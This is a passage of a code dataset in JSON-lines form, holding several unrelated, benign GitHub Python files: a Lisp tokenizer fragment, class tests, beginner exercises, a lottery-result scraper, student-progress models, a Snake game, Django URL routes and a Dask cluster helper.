' ' and string_open == False:\n            add_word()\n\n        elif k == \"'\": # list starter\n            if exp[index+1] == '(':\n                list_open = True\n                tokens.append(Token('list_open'))\n                index += 1\n\n        elif k == '\"':\n            if string_open: # close string\n                tokens.append(Token('word', w))\n                w = ''\n                string_open = False\n            else:\n                string_open = True\n\n        else:\n            w = w + k\n\n        index += 1\n    \n    return 
tokens","repo_name":"yortuc/lispip","sub_path":"tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"19612656099","text":"#!/usr/bin/env python3\n# pylint: disable=all\n'''\nChapter 9 Tests\n'''\n\nimport ch9\n\n\ndef test_create_scoops():\n '''\n test ch9.create_scoops()\n '''\n expected = '[Scoop(chocolate), Scoop(vanilla), Scoop(rocky road)]'\n got = ch9.create_scoops()\n assert str(got) == expected, f'{got} != {expected}'\n for i, flavor in enumerate(['chocolate', 'vanilla', 'rocky road']):\n assert got[i].flavor == flavor, f'{got[i].flavor} != {flavor}'\n\n\ndef test_Bowl_add_scoops_basic():\n '''\n test ch9.Bowl.add_scoops() basic usage\n '''\n expected = 'Scoop(vanilla),Scoop(chocolate),Scoop(avacado)'\n s1 = ch9.Scoop('vanilla')\n s2 = ch9.Scoop('chocolate')\n s3 = ch9.Scoop('avacado')\n b = ch9.Bowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n for i, flavor in enumerate(['vanilla', 'chocolate', 'avacado']):\n assert got.scoops[i].flavor == flavor, f'{got.scoops[i].flavor} != {flavor}'\n\n\ndef test_Bowl_add_scoops_max():\n '''\n test ch9.Bowl.add_scoops() max limit\n '''\n expected = 'Scoop(rocky road),Scoop(cookies and cream),Scoop(vanilla)'\n s1 = ch9.Scoop('rocky road')\n s2 = ch9.Scoop('cookies and cream')\n s3 = ch9.Scoop('vanilla')\n s4 = ch9.Scoop('chocolate')\n s5 = ch9.Scoop('avacado')\n b = ch9.Bowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3, s4)\n b.add_scoops(s5)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n assert len(got.scoops) == 3, f'len should be 3'\n for i, flavor in enumerate(['rocky road', 'cookies and cream', 'vanilla']):\n assert got.scoops[i].flavor == flavor, f'{fot.scoops[i].flavor} != {flavor}'\n\n\ndef test_BigBowl_add_scoops_max():\n '''\n test ch9.Bowl.add_scoops() max limit\n '''\n expected = 'Scoop(cookies and cream),Scoop(rocky road),Scoop(cookie dough),Scoop(chocolate),Scoop(vanilla)'\n s1 = ch9.Scoop('cookies and cream')\n s2 = ch9.Scoop('rocky road')\n s3 = ch9.Scoop('cookie dough')\n s4 = ch9.Scoop('chocolate')\n s5 = ch9.Scoop('vanilla')\n s6 = ch9.Scoop('avacado')\n b = ch9.BigBowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3, s4)\n b.add_scoops(s5, s6)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n assert len(got.scoops) == 5, f'len should be 5'\n for i, flavor in enumerate([\n 'cookies and cream',\n 'rocky road',\n 'cookie dough',\n 'chocolate',\n 'vanilla',\n ]):\n assert got.scoops[i].flavor == flavor, f'{got[i].scoops.flavor} != {flavor}'\n\n\ndef test_FlexibleDict():\n '''\n test ch9.FlexibleDict()\n '''\n\n # test string as key\n fda = ch9.FlexibleDict()\n fda['a'] = 300\n assert fda['a'] == 300, f\"fda['a'] should be 300\"\n\n # test int as key\n fdb = ch9.FlexibleDict()\n fdb[5] = 500\n assert fdb[5] == 500, f'fdb[5] should be 500'\n\n # test int as key with string as accessor\n fdc = ch9.FlexibleDict()\n fdc[1] = 100\n assert fdc['1'] == 100, f\"fdc['1'] should be 100\"\n\n # test string as key with int as accessor\n fdd = ch9.FlexibleDict()\n fdd['1'] = 200\n assert fdd[1] == 200, f'fdd[1] should be 200'\n\n # test non-existent key\n fde = ch9.FlexibleDict()\n assert fde['nothing'] == None, f\"fde['nothing'] should be 
None\"\n","repo_name":"kylerisse/python-workout","sub_path":"src/ch9_test.py","file_name":"ch9_test.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29997554427","text":"\ndef sum_digits(a, b):\n s=0\n for i in range (a,b+1):\n l=len(str(i))\n n=i;\n for j in range(l):\n s+=n%(10)\n n=int(n/10)\n return s\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kmruefq3dhdqxtLeM_12.py","file_name":"kmruefq3dhdqxtLeM_12.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11588566505","text":"import sys\nn=int(raw_input())\na=0\ng=0\nwhile(n>0):\n r=raw_input().split()\n r[0]=int(r[0])\n r[1]=int(r[1])\n if(g+r[0]-a<=500):\n g+=r[0]\n sys.stdout.write(\"A\")\n else:\n a+=r[1]\n sys.stdout.write(\"G\")\n n-=1\n","repo_name":"swapnil085/CP-Codeforces","sub_path":"282b.py","file_name":"282b.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8599137049","text":"#------------------------------\n# FUNCTION\n#------------------------------\n\n# function Non parameter\ndef halo_dunia():\n var = \"Halo Python, Halo dunia...\"\n print(var)\n\nhalo_dunia()\n\nprint('')\n\n# function parameter\ndef selamat_datang(nama):\n var = f'Halo {nama}, welcome!'\n print(var)\n\nselamat_datang('rijal')\n\ndef selamat_datang(nama, dari):\n var = f'Halo {nama}, dari {dari}!'\n print(var)\n\nselamat_datang('rijal', 'jakarta')\nselamat_datang(dari='jogja', nama='budi')\n\ndef selamat_datang(*daftar_nama):\n var = 'Halo '\n for nama in daftar_nama:\n var += nama + ', '\n \n var += 'Welcome'\n print(var)\n\nselamat_datang('satu', 'dua', 'tiga')\n\nprint('')\n\n# function Anonim\ndouble = lambda x : x * 2\n\nprint(double(5))\n\nprint('')\n\n# Bonus = Docstring\ndef selamat_datang(nama):\n '''\n Ini adalah function untuk menyapa\n nama yang telah ada pada parameter\n '''\n var = f'Halo {nama}, welcome!'\n print(var)\n\nselamat_datang('rijal')\nprint(selamat_datang.__doc__) # mencetak string comment\n\n# Bonus Scope & Return\na = 2\nb = 1\nx = 100\n\ndef operasi(a, b, c=1): # nilai c diberikan secara default jika pada pemanggilan fungsi tidak di cantumkan.\n op1 = a + b\n op2 = op1 // c\n\n print('a di dalam function:', a) # nilai scope di dalam function\n print('b di dalam function:', b)\n\n print(x)\n\n return op2 # memberikan nilai balik\n\nhasil = operasi(a=10, b=5, c=3)\nprint(hasil)\n\nprint('a di luar function:', a) # nilai scope di luar function\nprint('b di luar function:', b)\n\nprint('')\n\n# Exercise\n# Buatlah fungsi yang akan mengevaluasi apakah modulus dari hasil kali 2 angka yang diterima bernilai 0 atau tidak\n# Gunakan statement return untuk mengembalikan nilai tersebut lalu cetak hasilnya\n# Beri nama cek_modulus() pada fungsi tersebut\nprint('Exercise')\n\nangka1 = 12\nangka2 = 8\n\ndef cek_modulus(a, b):\n a *= 2\n b *= 2\n y = a % b\n\n return y\n\nhasil = cek_modulus(12, 8)\nprint('Modulus dari 12 dan 8 adalah = ', hasil)\n","repo_name":"rij4l-it/Indonesia-AI-Python-Programming-Course","sub_path":"lat_6.py","file_name":"lat_6.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38101061160","text":"from urllib.request import Request, urlopen\nimport logging\nimport requests\n\nfrom bs4 
import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\nTIMEOUT = 20\n\n\ndef get_result_from_google_search() -> list:\n    \"\"\"\n    Scrape the Google results page, format the data into a list of integers,\n    and return it.\n\n    :return: [ int ]\n    \"\"\"\n    result_list = []\n\n    try:\n        url = 'https://www.google.com/search?q=caixa+mega+sena'\n\n        request = Request(url)\n\n        request.add_header('User-Agent',\n                           'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 '\n                           '(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36')\n\n        raw_response = urlopen(request, timeout=TIMEOUT).read()\n\n        html = raw_response.decode(\"utf-8\")\n        soup = BeautifulSoup(html, 'html.parser')\n\n        data = soup.findAll(\"span\", attrs={\"class\": \"zSMazd\"})\n\n        if data:\n            result_list = [int(span.text) for span in data]\n            logger.warning(f\"Webscrapping Google Result - {result_list}\")\n\n    except Exception as ex:\n        logger.error(f\"ERROR Webscraping Google - {str(ex)}\")\n\n    return result_list\n\n\ndef get_result_from_cef() -> list:\n    \"\"\"\n    Scrape the Caixa Econômica Federal page, format the data into a list of integers,\n    and return it.\n\n    :return: [ int ]\n    \"\"\"\n\n    result_list = []\n\n    try:\n        url = \"http://www.loterias.caixa.gov.br/wps/portal/loterias\"\n\n        html = requests.get(url, timeout=TIMEOUT).content\n        soup = BeautifulSoup(html, 'html.parser')\n\n        data = soup.find(\"ul\", attrs={\"class\": \"resultado-loteria mega-sena\"})\n\n        if data:\n            result_list = [int(li.text) for li in data.findAll(\"li\")]\n\n            logger.warning(f\"Webscrapping CEF Result - {result_list}\")\n    except Exception as ex:\n        logger.error(f\"ERROR Webscraping CEF - {str(ex)}\")\n\n    return result_list\n\n\ndef get_lottery_result() -> list:\n    \"\"\"\n    Core function that fetches the Mega-Sena result, trying to scrape Google or the\n    Caixa Econômica Federal page.\n\n    :return: [ int ]\n    \"\"\"\n\n    response = get_result_from_google_search() or get_result_from_cef()\n    if not response:\n        raise Exception(\"It was not possible to get the result of the mega sena\")\n    return response\n","repo_name":"caiomagri/teste-python-backend","sub_path":"api/core/apps/lottery/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12887459823","text":"from collections import defaultdict\n\n\ndef get_activity(taken, approved, accumulated, semester):\n    # DONE\n    percentage = accumulated * 100 / 16\n    if accumulated == 16:\n        if taken == 0:\n            return None\n        else:\n            return \"Qualified ({}). 16/16\".format(semester)\n    # TOOK NO COURSES\n    elif taken == 0:\n        return \"No requirements taken ({}). {}/16\".format(semester, accumulated)\n    # TOOK COURSES AND PROGRESSED\n    elif taken > 0 and approved > 0:\n        return \"Approved Reqs ({}). {}/16\".format(semester, accumulated)\n    # TOOK COURSES AND DID NOT PROGRESS\n    elif taken > 0 and approved == 0:\n        return \"No approved Reqs. ({}). 
","repo_name":"caiomagri/teste-python-backend","sub_path":"api/core/apps/lottery/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12887459823","text":"from collections import defaultdict\nfrom datetime import date, timedelta\n\n\ndef get_activity(taken, approved, accumulated, semester):\n    # DONE (all 16 requirements)\n    percentage = accumulated * 100 / 16\n    if accumulated == 16:\n        if taken == 0:\n            return None\n        else:\n            return \"Qualified ({}). 16/16\".format(semester)\n    # TOOK NO COURSES\n    elif taken == 0:\n        return \"No requirements taken ({}). {}/16\".format(semester, accumulated)\n    # TOOK COURSES AND PROGRESSED\n    elif taken > 0 and approved > 0:\n        return \"Approved Reqs ({}). {}/16\".format(semester, accumulated)\n    # TOOK COURSES AND DID NOT PROGRESS\n    elif taken > 0 and approved == 0:\n        return \"No approved Reqs. ({}). {}/16\".format(semester, accumulated)\n\n\ndef timestamp_before(date_str, days):\n    # Shift a \"YYYY/MM/DD\" string back by `days`; datetime arithmetic keeps\n    # month and year boundaries correct (naive day subtraction did not).\n    year, month, day = (int(part) for part in date_str.split(\"/\"))\n    shifted = date(year, month, day) - timedelta(days=days)\n    return shifted.strftime(\"%Y/%m/%d\")\n\n\ndef timestamp_after(date_str, days):\n    # Shift a \"YYYY/MM/DD\" string forward by `days`, with the same guarantee.\n    year, month, day = (int(part) for part in date_str.split(\"/\"))\n    shifted = date(year, month, day) + timedelta(days=days)\n    return shifted.strftime(\"%Y/%m/%d\")\n\n\nclass Student:\n\n    all = {}\n\n    def __init__(self, data):\n        self.__dict__ = data\n        self.student_id = \"{}{}\".format(\n            data['student_number'], data['admission_year'])\n        Student.all.update({self.student_id: self})\n        self.courses = defaultdict(list)\n        self.semesters = defaultdict(list)\n        self.semester_count = 3 * (2018 - int(data['admission_year']))\n        self.requirements_ready = False\n        self.requirements_ready_at = \"\"\n\n    @classmethod\n    def filter_by(cls, field, value):\n        return {k: v for k, v in cls.all.items() if getattr(v, field) == value}\n\n    def progress_per_semester(self):\n        progresses = {}\n        accumulated = 0\n        for semester_number in range(1, self.semester_count + 1):\n            semester = int(semester_number)\n            start_timestamp, end_timestamp = Course.timestamp_from_relative(\n                semester, self.admission_year)\n            if semester in self.semesters.keys():\n                courses = self.semesters[semester]\n                taken = len(courses)\n                approved = len([c for c in courses if float(\n                    c.final_grade) >= 4.0 or c.alpha_final_grade == \"A\"])\n            else:\n                courses = []\n                taken = 0\n                approved = 0\n            failed = taken - approved\n            accumulated += approved\n            percentage = accumulated * 100 / 16\n            if accumulated == 16:\n                self.requirements_ready = True\n                self.requirements_ready_at = semester_number\n            semester_name = \"{}º SEM\".format(semester_number - int(semester_number / 3))\n            if semester_number % 3 == 0:\n                semester_name = \"{}º TAV\".format(int(semester_number / 3))\n            progresses.update(\n                {semester: {\n                    \"semester\": semester,\n                    \"semester_name\": semester_name,\n                    \"percentage\": percentage,\n                    \"approved\": approved,\n                    \"failed\": failed,\n                    \"taken\": taken,\n                    \"accumulated\": accumulated,\n                    \"total\": 16,\n                    \"semester_start\": start_timestamp,\n                    \"semester_end\": end_timestamp,\n                    \"start_timestamp\": timestamp_after(end_timestamp, 3),\n                    \"end_timestamp\": timestamp_after(end_timestamp, 4),\n                    \"activity\": get_activity(taken, approved, accumulated, semester_name)\n                }})\n        return progresses\n\n\nclass Course:\n\n    all = {}\n\n    # format month/day\n    timestamps = {\n        1: {\n            \"start_date\": \"03/05\",\n            \"end_date\": \"07/04\",\n        },\n        2: {\n            \"start_date\": \"08/04\",\n            \"end_date\": \"12/15\",\n        },\n        3: {\n            \"start_date\": \"01/04\",\n            \"end_date\": \"02/22\",\n        }\n    }\n\n    def __init__(self, data):\n        self.__dict__ = data\n        self.course_id = \"{}{}{}\".format(\n            data['rut'], data['initials'], data['semester'])\n        self.case_id = ['student_number']\n        self.student_id = \"{}{}\".format(\n            data['student_number'], data['admission_year'])\n        self.start_timestamp, self.end_timestamp = Course.timestamp_from_absolute(\n            data['semester'], data['year'])\n        self.grade = data['final_grade'] if data['final_grade'] != \"nan\" else data['alpha_final_grade']\n\n        Course.all.update({self.course_id: self})\n\n    @classmethod\n    def filter_by(cls, field, value):\n        return {k: v for k, v in cls.all.items() if getattr(v, field) == value}\n\n    @classmethod\n    def timestamp_from_relative(cls, relative_semester, admission_year):\n        relative_semester = int(relative_semester)\n        semester = 3 if relative_semester % 3 == 0 else 
relative_semester % 3\n start = cls.timestamps[semester]['start_date']\n end = cls.timestamps[semester]['end_date']\n year = int(admission_year) + int(relative_semester / 3)\n return [\"{}/{}\".format(year, start), \"{}/{}\".format(year, end)]\n\n @classmethod\n def timestamp_from_absolute(cls, absolute_semester, year):\n semester = int(absolute_semester)\n start = cls.timestamps[semester]['start_date']\n end = cls.timestamps[semester]['end_date']\n year = int(year) + int(semester / 3)\n return [\"{}/{}\".format(year, start), \"{}/{}\".format(year, end)]\n\n @classmethod\n def with_initials(cls, initials):\n return {k: v for k, v in cls.all.items() if v.initials in initials}\n\n @classmethod\n def from_students(cls, students):\n return {k: v for k, v in cls.all.items() if v.student_id in students}\n\n def __repr__(self):\n return \"{}-{} {}-{}: {} ({})\".format(self.year, self.semester, self.initials, self.section, self.course_name, self.grade)\n\n def relative_semester(self):\n relative_year = int(self.year) - int(self.admission_year)\n semester = relative_year * 3 + int(self.semester)\n return int(semester)\n\n\nclass Requirement:\n\n all = {}\n\n def __init__(self, **data):\n self.initials = data['initials']\n self.valid_initials = data['valid_initials'] + [self.initials]\n self.name = data['name']\n self.semester = data['semester']\n\n if self.valid_initials:\n for initial in self.valid_initials:\n Requirement.all.update({initial: self})\n\n\n# class ProgressActivity:\n\n # JUST TO DUMP DATA!\n\n\nclass StudentRaw:\n all = []\n\n prop_names = {\n 'RUT': 'rut',\n 'N°ALUMNO': 'student_number',\n 'CURRICULUM': 'curriculum',\n 'CODIGO PROGRAMA': 'program_code',\n 'PROGRAMA': 'program',\n 'CODIGO PREFERENCIA ESPECIALIDAD': 'specialty_preference_code',\n 'PREFERENCIA ESPECIALIDAD': 'specialty_preference',\n 'CODIGO PREFERENCIA MAJOR': 'major_preference_code',\n 'PREFERENCIA MAJOR': 'major_preference',\n 'CODIGO MAJOR SELECCIONADO': 'selected_major_code',\n 'MAJOR SELECCIONADO': 'selected_major',\n 'CODIGO MINOR SELECCIONADO': 'selected_minor_code',\n 'MINOR SELECCIONADO': 'selected_minor',\n 'TRACK/ÁREA': 'track',\n 'PLAN DE ESTUDIOS PERSONALIZADO': 'customized_studies_plan',\n 'ESTADO': 'state',\n 'AÑO INGRESO': 'admission_year',\n 'VÍA DE INGRESO': 'admission_way',\n 'TIPO INGRESO ESPECIAL': 'special_admission_type',\n 'PROM. 
PPA': 'ppa',\n 'TOTAL CRÉDITOS APROBADOS': 'total_approved_credits',\n 'TOTAL CRÉDITOS CONVALIDADOS': 'total_validated_credits',\n 'TOTAL CRÉDITOS APROBADOS+CONVALIDADOS': 'total_approved_and_validated_credits',\n 'TOTAL CRÉDITOS REPROBADOS': 'total_failed_credits',\n 'TOTAL CRÉDITOS INSCRITOS': 'total_enrolled_credits',\n 'N° CAUSALES ELIMINACIÓN (POR SEMESTRE)': 'elimination_causals_number',\n 'ESTUDIOS VIGENTES(PARALELO)': 'valid_studies',\n 'ESTUDIOS NO VIGENTES(FINALIZADOS POR ALGÚN MOTIVO)': 'invalid_studies',\n 'LICENCIADO': 'licensed',\n 'FECHA LIC.': 'licensed_at',\n 'EGRESADO': 'graduated',\n 'FECHA EGR.': 'graduated_at',\n 'TITULADO': 'tituled',\n 'COLEGIO REGIÓN': 'school_region',\n 'COLEGIO TIPO': 'school_type',\n 'COLEGIO EGRESO': 'school_of_graduation',\n 'ESTADO DSRD ACTUAL': 'dsrd_current_state',\n 'TIPO INGRESO': 'admission_type',\n 'PUESTO': 'admission_ranking',\n }\n\n def __init__(self, **kwargs):\n self.rut = str(kwargs.get('RUT', ''))\n self.student_number = str(kwargs.get('N°ALUMNO', ''))\n self.curriculum = str(kwargs.get('CURRICULUM', ''))\n self.program_code = str(kwargs.get('CODIGO PROGRAMA', ''))\n self.program = str(kwargs.get('PROGRAMA', ''))\n self.specialty_preference_code = str(kwargs.get(\n 'CODIGO PREFERENCIA ESPECIALIDAD', ''))\n self.specialty_preference = str(kwargs.get(\n 'PREFERENCIA ESPECIALIDAD', ''))\n self.major_preference_code = str(kwargs.get(\n 'CODIGO PREFERENCIA MAJOR', ''))\n self.major_preference = str(kwargs.get('PREFERENCIA MAJOR', ''))\n self.selected_major_code = str(kwargs.get(\n 'CODIGO MAJOR SELECCIONADO', ''))\n self.selected_major = str(kwargs.get('MAJOR SELECCIONADO', ''))\n self.selected_minor_code = str(kwargs.get(\n 'CODIGO MINOR SELECCIONADO', ''))\n self.selected_minor = str(kwargs.get('MINOR SELECCIONADO', ''))\n self.track = str(kwargs.get('TRACK/ÁREA', ''))\n self.customized_studies_plan = str(kwargs.get(\n 'PLAN DE ESTUDIOS PERSONALIZADO', ''))\n self.state = str(kwargs.get('ESTADO', ''))\n self.admission_year = str(kwargs.get('AÑO INGRESO', ''))\n self.admission_way = str(kwargs.get('VÍA DE INGRESO', ''))\n self.special_admission_type = str(\n kwargs.get('TIPO INGRESO ESPECIAL', ''))\n self.ppa = str(kwargs.get('PROM. 
PPA', ''))\n self.total_approved_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS APROBADOS', ''))\n self.total_validated_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS CONVALIDADOS', ''))\n self.total_approved_and_validated_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS APROBADOS+CONVALIDADOS', ''))\n self.total_failed_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS REPROBADOS', ''))\n self.total_enrolled_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS INSCRITOS', ''))\n self.elimination_causals_number = str(kwargs.get(\n 'N° CAUSALES ELIMINACIÓN (POR SEMESTRE)', ''))\n self.valid_studies = str(kwargs.get('ESTUDIOS VIGENTES(PARALELO)', ''))\n self.invalid_studies = str(kwargs.get(\n 'ESTUDIOS NO VIGENTES(FINALIZADOS POR ALGÚN MOTIVO)', ''))\n self.licensed = str(kwargs.get('LICENCIADO', ''))\n self.licensed_at = str(kwargs.get('FECHA LIC.', ''))\n self.graduated = str(kwargs.get('EGRESADO', ''))\n self.graduated_at = str(kwargs.get('FECHA EGR.', ''))\n self.tituled = str(kwargs.get('TITULADO', ''))\n self.school_region = str(kwargs.get('COLEGIO REGIÓN', ''))\n self.school_type = str(kwargs.get('COLEGIO TIPO', ''))\n self.school_of_graduation = str(kwargs.get('COLEGIO EGRESO', ''))\n self.dsrd_current_state = str(kwargs.get('ESTADO DSRD ACTUAL', ''))\n self.admission_type = str(kwargs.get('TIPO INGRESO', ''))\n self.admission_ranking = str(kwargs.get('PUESTO', ''))\n StudentRaw.all.append(self)\n\n\nclass CourseRaw:\n all = []\n\n prop_names = {\n 'RUT': 'rut',\n 'N°ALUMNO': 'student_number',\n 'SEXO': 'sex',\n 'AÑO ADMISIÓN': 'admission_year',\n 'PROGRAMA CODIGO': 'program_code',\n 'PROGRAMA': 'program',\n 'MAJOR CODIGO SELECCIONADO': 'selected_major_code',\n 'MAJOR SELECCIONADO': 'selected_major',\n 'MAJOR TRACK/ÁREA ': 'track',\n 'MINOR CODIGO SELECCIONADO': 'selected_minor_code',\n 'MINOR SELECCIONADO': 'selected_minor',\n 'CREDITOS ALUMNO': 'student_credits',\n 'CURSO CURRICULUM': 'curriculum_course',\n 'CURSO PROGRAMA': 'program_course',\n 'AÑO': 'year',\n 'SEMESTRE': 'semester',\n 'SIGLA': 'initials',\n 'SECCIÓN': 'section',\n 'NOMBRE CURSO': 'course_name',\n 'CREDITOS CURSO': 'course_credits',\n 'NOTA FINAL': 'final_grade',\n 'NOTA FINAL ALFA': 'alpha_final_grade',\n 'PPA Global': 'global_ppa',\n 'Estado en DARA': 'dara_state',\n 'VIA INGRESO': 'admission_way',\n 'VIA CASO INGRESO': 'admission_case_way',\n }\n\n def __init__(self, **kwargs):\n self.rut = str(kwargs.get('RUT', ''))\n self.student_number = str(kwargs.get('N°ALUMNO', ''))\n self.sex = str(kwargs.get('SEXO', ''))\n self.admission_year = str(kwargs.get('AÑO ADMISIÓN', ''))\n self.program_code = str(kwargs.get('PROGRAMA CODIGO', ''))\n self.program = str(kwargs.get('PROGRAMA', ''))\n self.selected_major_code = str(kwargs.get(\n 'MAJOR CODIGO SELECCIONADO', ''))\n self.selected_major = str(kwargs.get('MAJOR SELECCIONADO', ''))\n self.track = str(kwargs.get('MAJOR TRACK/ÁREA ', ''))\n self.selected_minor_code = str(kwargs.get(\n 'MINOR CODIGO SELECCIONADO', ''))\n self.selected_minor = str(kwargs.get('MINOR SELECCIONADO', ''))\n self.student_credits = str(kwargs.get('CREDITOS ALUMNO', ''))\n self.curriculum_course = str(kwargs.get('CURSO CURRICULUM', ''))\n self.program_course = str(kwargs.get('CURSO PROGRAMA', ''))\n self.year = str(kwargs.get('AÑO', ''))\n self.semester = str(kwargs.get('SEMESTRE', ''))\n self.initials = str(kwargs.get('SIGLA', ''))\n self.section = str(kwargs.get('SECCIÓN', ''))\n self.course_name = str(kwargs.get('NOMBRE CURSO', ''))\n self.course_credits = str(kwargs.get('CREDITOS CURSO', ''))\n self.final_grade = 
str(kwargs.get('NOTA FINAL', ''))\n self.alpha_final_grade = str(kwargs.get('NOTA FINAL ALFA', ''))\n self.global_ppa = str(kwargs.get('PPA Global', ''))\n self.dara_state = str(kwargs.get('Estado en DARA', ''))\n self.admission_way = str(kwargs.get('VIA INGRESO', ''))\n self.admission_case_way = str(kwargs.get('VIA CASO INGRESO', ''))\n CourseRaw.all.append(self)\n\n\nif __name__ == '__main__':\n print(\"This module doesn't run code. Try running the 'main.py' file!\")\n\n # for k, v in course_prop_names.items():\n # print(\"self.{} = str(kwargs.get('{}', ''))\".format(v, k))\n","repo_name":"vjfuenzalida/process-mining-proyecto","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5783024464","text":"from turtle import Turtle\nimport time\n\nUP = 90\nDOWN = 270\nRIGHT = 0\nLEFT = 180\n\nSTARTING_POSITIONS = ((0,0),(-20,0),(-40,0))\n\n\nclass Snake:\n def __init__(self):\n self.snake = []\n self.create_snake()\n self.head = self.snake[0]\n self.speed = .1\n\n def add_dot(self, position):\n new_dot = Turtle('square')\n new_dot.color('green')\n new_dot.penup()\n new_dot.goto(position)\n self.snake.append(new_dot)\n\n def extend(self):\n self.add_dot(self.snake[-1].position())\n self.speed *= .98\n print(self.speed)\n\n def create_snake(self):\n for position in STARTING_POSITIONS:\n self.add_dot(position)\n def reset(self):\n\n for seg in self.snake:\n seg.goto(1000, 1000)\n\n self.snake.clear()\n self.create_snake()\n self.head = self.snake[0]\n self.speed = .1\n\n\n def move(self):\n time.sleep(self.speed)\n for snake_dot in range(len(self.snake) - 1, 0, -1):\n new_x = self.snake[snake_dot - 1].xcor()\n new_y = self.snake[snake_dot - 1].ycor()\n self.snake[snake_dot].goto(new_x, new_y)\n self.head.forward(20)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.seth(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.seth(DOWN)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.seth(RIGHT)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.seth(LEFT)\n\n","repo_name":"Sergio-rod/BootCampPythonDjango","sub_path":"day20_Snake_Game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11169693070","text":"from django.urls import path\nfrom satchmo.product.views import IngredientsListView\nfrom satchmo.product.filterviews import display_bestsellers\n\nfrom satchmo.product.adminviews import (\n edit_inventory,\n picking_list,\n export_products,\n import_products,\n product_active_report,\n variation_manager,\n variation_list,\n)\nfrom satchmo.product.brand.views import brand_category_page\nfrom satchmo.product.views import (\n get_configurable_product_options,\n get_product,\n get_price,\n get_price_detail,\n category_view,\n category_index,\n)\n\n\nurlpatterns = [\n path(\n \"product/view/bestsellers/\",\n display_bestsellers,\n {},\n \"satchmo_product_best_selling\",\n ),\n path(\n \"product/ingredients/\", IngredientsListView.as_view(), name=\"ingredients_list\"\n ),\n path(\"product/inventory/edit/\", edit_inventory, {}, \"satchmo_admin_edit_inventory\"),\n path(\"order/picking-list/\", picking_list, {}, \"satchmo_admin_picking_list\"),\n path(\n \"product/inventory/export/\", export_products, {}, \"satchmo_admin_product_export\"\n ),\n path(\n 
\"product/inventory/import/\", import_products, {}, \"satchmo_admin_product_import\"\n    ),\n    path(\n        \"product/inventory/report/\",\n        product_active_report,\n        {},\n        \"satchmo_admin_product_report\",\n    ),\n    path(\n        \"product/admin//variations/\",\n        variation_manager,\n        {},\n        \"satchmo_admin_variation_manager\",\n    ),\n    path(\n        \"product/admin/variations/\", variation_list, {}, \"satchmo_admin_variation_list\"\n    ),\n    path(\n        \"product/configurableproduct//getoptions/\",\n        get_configurable_product_options,\n        {},\n        \"satchmo_admin_configurableproduct\",\n    ),\n    path(\n        \"//\",\n        brand_category_page,\n        {},\n        name=\"satchmo_brand_category_view\",\n    ),\n    path(\n        \"///\",\n        get_product,\n        {},\n        \"satchmo_product\",\n    ),\n    path(\n        \"///prices/\",\n        get_price,\n        {},\n        \"satchmo_product_prices\",\n    ),\n    path(\n        \"///price_detail/\",\n        get_price_detail,\n        {},\n        \"satchmo_product_price_detail\",\n    ),\n    path(\"/\", category_view, {}, \"satchmo_category\"),\n    path(\"\", category_index, {}, \"satchmo_category_index\"),\n]\n","repo_name":"ToeKnee/jelly-roll","sub_path":"satchmo/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2283670811","text":"import getpass\nfrom dask_gateway import Gateway, BasicAuth\nfrom distributed import Client\n\n\nclass DaskCluster:\n    gateway_registry = {\n        \"central-site\": \"https://dedl-centralsite.eodc.eu/dask\",\n        \"bridge\": \"https://dedl-bridge.eodc.eu/dask\",\n    }\n\n    cluster_scale_limits = {\n        \"central-site\": {\"min\": 2, \"max\": 20},\n        \"bridge\": {\"min\": 2, \"max\": 10},\n    }\n\n    def __init__(self, name):\n        self.name = name\n\n    def login(self, username) -> BasicAuth:\n        return BasicAuth(username, getpass.getpass())\n\n    def get_gateways(self) -> None:\n        for site in self.gateway_registry:\n            print(f\"{site}: {self.gateway_registry[site]}\")\n\n    def create_cluster(self, authobj: BasicAuth) -> None:\n        self.gateway = {}\n        self.cluster = {}\n        self.client = {}\n\n        for site in self.gateway_registry:\n            # connect to gateway\n            self.gateway[site] 